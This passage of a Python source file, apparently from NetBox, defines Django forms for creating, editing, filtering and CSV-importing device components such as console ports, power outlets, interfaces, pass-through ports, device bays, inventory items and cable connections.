choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
tag = TagFilterField(model)
#
# Device components
#
class ComponentCreateForm(ComponentForm):
"""
Base form for the creation of device components (models subclassed from ComponentModel).
"""
device = DynamicModelChoiceField(
queryset=Device.objects.all(),
display_field='display_name'
)
description = forms.CharField(
max_length=100,
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class DeviceBulkAddComponentForm(ComponentForm):
pk = forms.ModelMultipleChoiceField(
queryset=Device.objects.all(),
widget=forms.MultipleHiddenInput()
)
description = forms.CharField(
max_length=100,
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
#
# Console ports
#
class ConsolePortFilterForm(DeviceComponentFilterForm):
model = ConsolePort
type = forms.MultipleChoiceField(
choices=ConsolePortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class ConsolePortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = ConsolePort
fields = [
'device', 'name', 'label', 'type', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class ConsolePortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkCreateForm(
form_from_model(ConsolePort, ['type']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkEditForm(
form_from_model(ConsolePort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=ConsolePort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class ConsolePortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
class Meta:
model = ConsolePort
fields = ConsolePort.csv_headers
#
# Console server ports
#
class ConsoleServerPortFilterForm(DeviceComponentFilterForm):
model = ConsoleServerPort
type = forms.MultipleChoiceField(
choices=ConsolePortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class ConsoleServerPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = ConsoleServerPort
fields = [
'device', 'name', 'label', 'type', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class ConsoleServerPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkCreateForm(
form_from_model(ConsoleServerPort, ['type']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkEditForm(
form_from_model(ConsoleServerPort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=ConsoleServerPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class ConsoleServerPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
class Meta:
model = ConsoleServerPort
fields = ConsoleServerPort.csv_headers
#
# Power ports
#
class PowerPortFilterForm(DeviceComponentFilterForm):
model = PowerPort
type = forms.MultipleChoiceField(
choices=PowerPortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class PowerPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerPort
fields = [
'device', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class PowerPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerPortTypeChoices),
required=False,
widget=StaticSelect2()
)
maximum_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Maximum draw in watts"
)
allocated_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Allocated draw in watts"
)
field_order = (
'device', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
)
class PowerPortBulkCreateForm(
form_from_model(PowerPort, ['type', 'maximum_draw', 'allocated_draw']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags')
class PowerPortBulkEditForm(
form_from_model(PowerPort, ['label', 'type', 'maximum_draw', 'allocated_draw', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=PowerPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class PowerPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
class Meta:
model = PowerPort
fields = PowerPort.csv_headers
#
# Power outlets
#
class PowerOutletFilterForm(DeviceComponentFilterForm):
model = PowerOutlet
type = forms.MultipleChoiceField(
choices=PowerOutletTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class PowerOutletForm(BootstrapMixin, forms.ModelForm):
power_port = forms.ModelChoiceField(
queryset=PowerPort.objects.all(),
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerOutlet
fields = [
'device', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port choices to the local device
if hasattr(self.instance, 'device'):
self.fields['power_port'].queryset = PowerPort.objects.filter(
device=self.instance.device
)
class PowerOutletCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerOutletTypeChoices),
required=False,
widget=StaticSelect2()
)
power_port = forms.ModelChoiceField(
queryset=PowerPort.objects.all(),
required=False
)
feed_leg = forms.ChoiceField(
choices=add_blank_choice(PowerOutletFeedLegChoices),
required=False
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg', 'description', 'tags')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port queryset to PowerPorts which belong to the parent Device
device = Device.objects.get(
pk=self.initial.get('device') or self.data.get('device')
)
self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
class PowerOutletBulkCreateForm(
form_from_model(PowerOutlet, ['type', 'feed_leg']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'feed_leg', 'description', 'tags')
class PowerOutletBulkEditForm(
form_from_model(PowerOutlet, ['label', 'type', 'feed_leg', 'power_port', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=PowerOutlet.objects.all(),
widget=forms.MultipleHiddenInput()
)
device = forms.ModelChoiceField(
queryset=Device.objects.all(),
required=False,
disabled=True,
widget=forms.HiddenInput()
)
class Meta:
nullable_fields = ('label', 'type', 'feed_leg', 'power_port', 'description')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port queryset to PowerPorts which belong to the parent Device
if 'device' in self.initial:
device = Device.objects.filter(pk=self.initial['device']).first()
self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
else:
self.fields['power_port'].choices = ()
self.fields['power_port'].widget.attrs['disabled'] = True
class PowerOutletCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
power_port = CSVModelChoiceField(
queryset=PowerPort.objects.all(),
required=False,
to_field_name='name',
help_text='Local power port which feeds this outlet'
)
feed_leg = CSVChoiceField(
choices=PowerOutletFeedLegChoices,
required=False,
help_text='Electrical phase (for three-phase circuits)'
)
class Meta:
model = PowerOutlet
fields = PowerOutlet.csv_headers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit PowerPort choices to those belonging to this device (or VC master)
if self.is_bound:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
device = None
else:
try:
device = self.instance.device
except Device.DoesNotExist:
device = None
if device:
self.fields['power_port'].queryset = PowerPort.objects.filter(
device__in=[device, device.get_vc_master()]
)
else:
self.fields['power_port'].queryset = PowerPort.objects.none()
#
# Interfaces
#
class InterfaceFilterForm(DeviceComponentFilterForm):
model = Interface
type = forms.MultipleChoiceField(
choices=InterfaceTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
enabled = forms.NullBooleanField(
required=False,
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
mac_address = forms.CharField(
required=False,
label='MAC address'
)
tag = TagFilterField(model)
class InterfaceForm(BootstrapMixin, InterfaceCommonForm, forms.ModelForm):
untagged_vlan = DynamicModelChoiceField(
queryset=VLAN.objects.all(),
required=False,
label='Untagged VLAN',
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tagged_vlans = DynamicModelMultipleChoiceField(
queryset=VLAN.objects.all(),
required=False,
label='Tagged VLANs',
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Interface
fields = [
'device', 'name', 'label', 'type', 'enabled', 'lag', 'mac_address', 'mtu', 'mgmt_only', 'description',
'mode', 'untagged_vlan', 'tagged_vlans', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
'type': StaticSelect2(),
'lag': StaticSelect2(),
'mode': StaticSelect2(),
}
labels = {
'mode': '802.1Q Mode',
}
help_texts = {
'mode': INTERFACE_MODE_HELP_TEXT,
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.is_bound:
device = Device.objects.get(pk=self.data['device'])
else:
device = self.instance.device
# Limit LAG choices to interfaces belonging to this device or a peer VC member
device_query = Q(device=device)
if device.virtual_chassis:
device_query |= Q(device__virtual_chassis=device.virtual_chassis)
self.fields['lag'].queryset = Interface.objects.filter(
device_query,
type=InterfaceTypeChoices.TYPE_LAG
).exclude(pk=self.instance.pk)
# Add current site to VLANs query params
self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceCreateForm(ComponentCreateForm, InterfaceCommonForm):
type = forms.ChoiceField(
choices=InterfaceTypeChoices,
widget=StaticSelect2(),
)
enabled = forms.BooleanField(
required=False,
initial=True
)
lag = forms.ModelChoiceField(
queryset=Interface.objects.all(),
required=False,
label='Parent LAG',
widget=StaticSelect2(),
)
mtu = forms.IntegerField(
required=False,
min_value=INTERFACE_MTU_MIN,
max_value=INTERFACE_MTU_MAX,
label='MTU'
)
mac_address = forms.CharField(
required=False,
label='MAC Address'
)
mgmt_only = forms.BooleanField(
required=False,
label='Management only',
help_text='This interface is used only for out-of-band management'
)
mode = forms.ChoiceField(
choices=add_blank_choice(InterfaceModeChoices),
required=False,
widget=StaticSelect2(),
)
untagged_vlan = DynamicModelChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tagged_vlans = DynamicModelMultipleChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
field_order = (
'device', 'name_pattern', 'label_pattern', 'type', 'enabled', 'lag', 'mtu', 'mac_address', 'description',
'mgmt_only', 'mode', 'untagged_vlan', 'tagged_vlans', 'tags'
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit LAG choices to interfaces belonging to this device or a peer VC member
device = Device.objects.get(
pk=self.initial.get('device') or self.data.get('device')
)
device_query = Q(device=device)
if device.virtual_chassis:
device_query |= Q(device__virtual_chassis=device.virtual_chassis)
self.fields['lag'].queryset = Interface.objects.filter(device_query, type=InterfaceTypeChoices.TYPE_LAG)
# Add current site to VLANs query params
self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceBulkCreateForm(
form_from_model(Interface, ['type', 'enabled', 'mtu', 'mgmt_only']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'enabled', 'mtu', 'mgmt_only', 'description', 'tags')
class InterfaceBulkEditForm(
form_from_model(Interface, [
'label', 'type', 'lag', 'mac_address', 'mtu', 'description', 'mode'
]),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=Interface.objects.all(),
widget=forms.MultipleHiddenInput()
)
device = forms.ModelChoiceField(
queryset=Device.objects.all(),
required=False,
disabled=True,
widget=forms.HiddenInput()
)
enabled = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect
)
mgmt_only = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect,
label='Management only'
)
untagged_vlan = DynamicModelChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tagged_vlans = DynamicModelMultipleChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
class Meta:
nullable_fields = (
'label', 'lag', 'mac_address', 'mtu', 'description', 'mode', 'untagged_vlan', 'tagged_vlans'
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit LAG choices to interfaces which belong to the parent device (or VC master)
if 'device' in self.initial:
device = Device.objects.filter(pk=self.initial['device']).first()
self.fields['lag'].queryset = Interface.objects.filter(
device__in=[device, device.get_vc_master()],
type=InterfaceTypeChoices.TYPE_LAG
)
# Add current site to VLANs query params
self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
else:
# See 4523
if 'pk' in self.initial:
site = None
interfaces = Interface.objects.filter(pk__in=self.initial['pk']).prefetch_related('device__site')
# Check interface sites. First interface should set site, further interfaces will either continue the
# loop or reset back to no site and break the loop.
for interface in interfaces:
if site is None:
site = interface.device.site
elif interface.device.site is not site:
site = None
break
if site is not None:
self.fields['untagged_vlan'].widget.add_query_param('site_id', site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', site.pk)
self.fields['lag'].choices = ()
self.fields['lag'].widget.attrs['disabled'] = True
def clean(self):
super().clean()
# Untagged interfaces cannot be assigned tagged VLANs
if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and self.cleaned_data['tagged_vlans']:
raise forms.ValidationError({
'mode': "An access interface cannot have tagged VLANs assigned."
})
# Remove all tagged VLAN assignments from "tagged all" interfaces
elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
self.cleaned_data['tagged_vlans'] = []
class InterfaceCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
lag = CSVModelChoiceField(
queryset=Interface.objects.all(),
required=False,
to_field_name='name',
help_text='Parent LAG interface'
)
type = CSVChoiceField(
choices=InterfaceTypeChoices,
help_text='Physical medium'
)
mode = CSVChoiceField(
choices=InterfaceModeChoices,
required=False,
help_text='IEEE 802.1Q operational mode (for L2 interfaces)'
)
class Meta:
model = Interface
fields = Interface.csv_headers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit LAG choices to interfaces belonging to this device (or virtual chassis)
device = None
if self.is_bound and 'device' in self.data:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
pass
if device and device.virtual_chassis:
self.fields['lag'].queryset = Interface.objects.filter(
Q(device=device) | Q(device__virtual_chassis=device.virtual_chassis),
type=InterfaceTypeChoices.TYPE_LAG
)
elif device:
self.fields['lag'].queryset = Interface.objects.filter(
device=device,
type=InterfaceTypeChoices.TYPE_LAG
)
else:
self.fields['lag'].queryset = Interface.objects.none()
def clean_enabled(self):
# Make sure enabled is True when it's not included in the uploaded data
if 'enabled' not in self.data:
return True
else:
return self.cleaned_data['enabled']
#
# Front pass-through ports
#
class FrontPortFilterForm(DeviceComponentFilterForm):
model = FrontPort
type = forms.MultipleChoiceField(
choices=PortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class FrontPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = FrontPort
fields = [
'device', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
'type': StaticSelect2(),
'rear_port': StaticSelect2(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit RearPort choices to the local device
if hasattr(self.instance, 'device'):
self.fields['rear_port'].queryset = self.fields['rear_port'].queryset.filter(
device=self.instance.device
)
# TODO: Merge with FrontPortTemplateCreateForm to remove duplicate logic
class FrontPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2(),
)
rear_port_set = forms.MultipleChoiceField(
choices=[],
label='Rear ports',
help_text='Select one rear port assignment for each front port being created.',
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description', 'tags')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
device = Device.objects.get(
pk=self.initial.get('device') or self.data.get('device')
)
# Determine which rear port positions are occupied. These will be excluded from the list of available
# mappings.
occupied_port_positions = [
(front_port.rear_port_id, front_port.rear_port_position)
for front_port in device.frontports.all()
]
# Populate rear port choices
choices = []
rear_ports = RearPort.objects.filter(device=device)
for rear_port in rear_ports:
for i in range(1, rear_port.positions + 1):
if (rear_port.pk, i) not in occupied_port_positions:
choices.append(
('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
)
self.fields['rear_port_set'].choices = choices
def clean(self):
super().clean()
# Validate that the number of ports being created equals the number of selected (rear port, position) tuples
front_port_count = len(self.cleaned_data['name_pattern'])
rear_port_count = len(self.cleaned_data['rear_port_set'])
if front_port_count != rear_port_count:
raise forms.ValidationError({
'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
'were selected. These counts must match.'.format(front_port_count, rear_port_count)
})
def get_iterative_data(self, iteration):
# Assign rear port and position from selected set
rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')
return {
'rear_port': int(rear_port),
'rear_port_position': int(position),
}
# class FrontPortBulkCreateForm(
# form_from_model(FrontPort, ['label', 'type', 'description', 'tags']),
# DeviceBulkAddComponentForm
# ):
# pass
class FrontPortBulkEditForm(
form_from_model(FrontPort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=FrontPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class FrontPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
rear_port = CSVModelChoiceField(
queryset=RearPort.objects.all(),
to_field_name='name',
help_text='Corresponding rear port'
)
type = CSVChoiceField(
choices=PortTypeChoices,
help_text='Physical medium classification'
)
class Meta:
model = FrontPort
fields = FrontPort.csv_headers
help_texts = {
'rear_port_position': 'Mapped position on corresponding rear port',
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit RearPort choices to those belonging to this device (or VC master)
if self.is_bound:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
device = None
else:
try:
device = self.instance.device
except Device.DoesNotExist:
device = None
if device:
self.fields['rear_port'].queryset = RearPort.objects.filter(
device__in=[device, device.get_vc_master()]
)
else:
self.fields['rear_port'].queryset = RearPort.objects.none()
#
# Rear pass-through ports
#
class RearPortFilterForm(DeviceComponentFilterForm):
model = RearPort
type = forms.MultipleChoiceField(
choices=PortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class RearPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = RearPort
fields = [
'device', 'name', 'label', 'type', 'positions', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
'type': StaticSelect2(),
}
class RearPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2(),
)
positions = forms.IntegerField(
min_value=REARPORT_POSITIONS_MIN,
max_value=REARPORT_POSITIONS_MAX,
initial=1,
help_text='The number of front ports which may be mapped to each rear port'
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkCreateForm(
form_from_model(RearPort, ['type', 'positions']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkEditForm(
form_from_model(RearPort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=RearPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class RearPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
type = CSVChoiceField(
help_text='Physical medium classification',
choices=PortTypeChoices,
)
class Meta:
model = RearPort
fields = RearPort.csv_headers
help_texts = {
'positions': 'Number of front ports which may be mapped'
}
#
# Device bays
#
class DeviceBayFilterForm(DeviceComponentFilterForm):
model = DeviceBay
tag = TagFilterField(model)
class DeviceBayForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = DeviceBay
fields = [
'device', 'name', 'label', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class DeviceBayCreateForm(ComponentCreateForm):
field_order = ('device', 'name_pattern', 'label_pattern', 'description', 'tags')
class PopulateDeviceBayForm(BootstrapMixin, forms.Form):
installed_device = forms.ModelChoiceField(
queryset=Device.objects.all(),
label='Child Device',
help_text="Child devices must first be created and assigned to the site/rack of the parent device.",
widget=StaticSelect2(),
)
def __init__(self, device_bay, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['installed_device'].queryset = Device.objects.filter(
site=device_bay.device.site,
rack=device_bay.device.rack,
parent_bay__isnull=True,
device_type__u_height=0,
device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
).exclude(pk=device_bay.device.pk)
class DeviceBayBulkCreateForm(DeviceBulkAddComponentForm):
field_order = ('name_pattern', 'label_pattern', 'description', 'tags')
class DeviceBayBulkEditForm(
form_from_model(DeviceBay, ['label', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=DeviceBay.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class DeviceBayCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
installed_device = CSVModelChoiceField(
queryset=Device.objects.all(),
required=False,
to_field_name='name',
help_text='Child device installed within this bay',
error_messages={
'invalid_choice': 'Child device not found.',
}
)
class Meta:
model = DeviceBay
fields = DeviceBay.csv_headers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit installed device choices to devices of the correct type and location
if self.is_bound:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
device = None
else:
try:
device = self.instance.device
except Device.DoesNotExist:
device = None
if device:
self.fields['installed_device'].queryset = Device.objects.filter(
site=device.site,
rack=device.rack,
parent_bay__isnull=True,
device_type__u_height=0,
device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
).exclude(pk=device.pk)
else:
self.fields['installed_device'].queryset = Interface.objects.none()
#
# Inventory items
#
class InventoryItemForm(BootstrapMixin, forms.ModelForm):
device = DynamicModelChoiceField(
queryset=Device.objects.all(),
display_field='display_name'
)
parent = DynamicModelChoiceField(
queryset=InventoryItem.objects.all(),
required=False,
query_params={
'device_id': '$device'
}
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = InventoryItem
fields = [
'device', 'parent', 'name', 'label', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'description',
'tags',
]
class InventoryItemCreateForm(ComponentCreateForm):
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
parent = DynamicModelChoiceField(
queryset=InventoryItem.objects.all(),
required=False,
query_params={
'device_id': '$device'
}
)
part_id = forms.CharField(
max_length=50,
required=False,
label='Part ID'
)
serial = forms.CharField(
max_length=50,
required=False,
)
asset_tag = forms.CharField(
max_length=50,
required=False,
)
field_order = (
'device', 'parent', 'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag',
'description', 'tags',
)
class InventoryItemCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
manufacturer = CSVModelChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='name',
required=False
)
class Meta:
model = InventoryItem
fields = InventoryItem.csv_headers
class InventoryItemBulkCreateForm(
form_from_model(InventoryItem, ['manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered']),
DeviceBulkAddComponentForm
):
field_order = (
'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered', 'description',
'tags',
)
class InventoryItemBulkEditForm(
form_from_model(InventoryItem, ['label', 'manufacturer', 'part_id', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=InventoryItem.objects.all(),
widget=forms.MultipleHiddenInput()
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
class Meta:
nullable_fields = ('label', 'manufacturer', 'part_id', 'description')
class InventoryItemFilterForm(DeviceComponentFilterForm):
model = InventoryItem
manufacturer = DynamicModelMultipleChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='slug',
required=False
)
serial = forms.CharField(
required=False
)
asset_tag = forms.CharField(
required=False
)
discovered = forms.NullBooleanField(
required=False,
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
tag = TagFilterField(model)
#
# Cables
#
class ConnectCableToDeviceForm(BootstrapMixin, CustomFieldModelForm):
"""
Base form for connecting a Cable to a Device component
"""
termination_b_region = DynamicModelChoiceField(
queryset=Region.objects.all(),
label='Region',
required=False
)
termination_b_site = DynamicModelChoiceField(
queryset=Site.objects.all(),
label='Site',
required=False,
query_params={
'region_id': '$termination_b_region'
}
)
termination_b_rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
label='Rack',
required=False,
display_field='display_name',
null_option='None',
query_params={
'site_id': '$termination_b_site'
}
)
termination_b_device = DynamicModelChoiceField(
queryset=Device.objects.all(),
label='Device',
required=False,
display_field='display_name',
query_params={
'site_id': '$termination_b_site',
'rack_id': '$termination_b_rack',
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'termination_b_region', 'termination_b_site', 'termination_b_rack', 'termination_b_device',
'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
]
widgets = {
'status': StaticSelect2,
'type': StaticSelect2,
'length_unit': StaticSelect2,
}
def clean_termination_b_id(self):
# Return the PK rather than the object
return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToConsolePortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=ConsolePort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToConsoleServerPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=ConsoleServerPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToPowerPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=PowerPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToPowerOutletForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=PowerOutlet.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToInterfaceForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=Interface.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device',
'kind': 'physical',
}
)
class ConnectCableToFrontPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=FrontPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToRearPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=RearPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
